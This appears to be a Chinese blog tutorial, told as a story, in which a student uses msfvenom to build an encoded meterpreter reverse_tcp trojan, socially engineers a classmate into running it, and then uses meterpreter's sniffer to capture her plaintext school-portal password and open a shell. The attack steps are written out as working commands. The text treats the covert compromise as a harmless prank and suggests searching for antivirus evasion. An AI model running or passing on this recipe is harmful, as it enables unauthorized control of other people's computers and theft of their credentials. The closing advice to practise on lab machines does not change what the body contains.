引言
听说网络安全的成绩出来了,小丽迫不及待的进入教务管理系统,输入学号,密码查看自己的成绩,哇塞90分,不知小七考的怎么样,不过那个闷葫芦肯定不会告诉我的,要是我能知道她密码多好,就可以自己去看了,突然小丽想到,自己用wireshark抓到登陆教务系统的包中,竟然可看自己的用户名和密码,如果我能抓到小七登陆教务系统的包,那她的密码,她的成绩。。嘿嘿嘿,可我电脑上的wireshark只能抓经过我电脑网卡的包,不可能在小七电脑上装个wireshark抓包吧….该怎么办呢?总会有办法的,姐前几天Metasploit可不是白学的,等小七回来查成绩了,看我如何获取的她账号和密码!
撸起袖子干
实验环境
- kali linux(小丽)
WinXPenSP3(小七)
工具
1、 Metasploit
2、 msfvenom
3、 wireshark
制作并植入木马
‘’小七你回来了,网络成绩出来了”,“哦”,小七坐下来,打开了电脑,我也要开始行动了。。
1、 进入kali linux系统,打开Metasploit
2、 先利用msfvenom制作一个加密的木马,名字叫xiaoqi的exe程序,lhost是小丽(攻击者)电脑的ip,放入software文件夹中。
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.139.131 LPORT=4444 -f exe > software/xiaoqi.exe
然后将这个程序发给她(注:有时候这个木马会被杀毒软件查杀,大家可以百度怎样制作免杀木马,我这里采用编码进行加密),“小七,我看到一个跟你同名的程序耶,不会是哪个暗恋你的人制作的吧?”“懒得理你”,“别这样我发给你看看,你可别不敢啊”,“有什么不敢,看就看,给姐发过来”…
小七啊,小七,你的电脑马上就要被我控制了。。看到小七接收了木马,我这边赶紧在Metasploit中,设置监听
3、 输入:use exploit/multi/handler
4、 设置有效载荷:set payload windows/meterpreter/reverse_tcp
5、 查看使用该模块需要设置什么参数:show options
6、 yes代表是必须要设置的参数,lhost:攻击者的主机IP地址,这里就是姐电脑的IP啦(打开另一个终端,输入ifconfig查看)
7、 set lhost 192.168.139.131
8、 参数设置好后,开始监听:exploit 只要小七点击那个木马,我就她的电脑就会跟我建立连接,而且是她主动的,因为我们采用的的反向连接有效载荷reverse_tcp
好,小七点击恶意程序了,会话成功建立,哈哈
嗅探
各位,小七的电脑现在已经被我控制,现在我要利用嗅探器(sniffer)来捕获她主机的数据包。
1、 在新建的会话中输入use sniffer
2、 查看用于sniffer的命令,输入help
3、 查看小七电脑的数据包是从哪个网络接口出去的sniffer_interfaces
4、 可以看到是接口1 ,所以我要在接口1上抓包:sniffer_start 1
“小七,怎么还不查成绩啊,是不是还在想着那个xiaoqi.exe,也不知道谁恶作剧,这么可恶(查成绩,查成绩)”,小七并不理我,不过她开始进入系统输入账号密码查成绩了…我马上就要成功了!!!
她查完了,该捕获的包,我这边肯定捕获到了。
5、 停止抓包:sniffer_stop 1
6、 下载抓到的包:sniffer_dump 1 xiaoqi.pcap
7、打开新的终端,利用wireshark查看捕获的数据包,wireshark xiaoqi.pcap
8、查找包含小七账号,密码的包,一般我们登录都是采用post提交,可以看到用户名(username),密码(password)都是明文传输。
ok ,妈妈再也不用担心,我查不到小七的成绩啦~
让我们继续看看,除了嗅探数据包,我们还能做什么?
9、 继续 输入help
什么重启,关机,统统不在话下。
10、 输入shell,恭喜你,可以完全控制小七电脑了,当然我是个有道德的,除了看成绩其他的当然什么都不会做了。
结语
1、 建议大家自己在虚拟机搭建靶机进行实验,不要真的去侵犯别人隐私。
2、不要随便点击别人发给你的链接或小程序。
3、 其实获取受害者shell的方法有很多,我用木马只是其中一种。
4、msfvenom使用简介
1万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
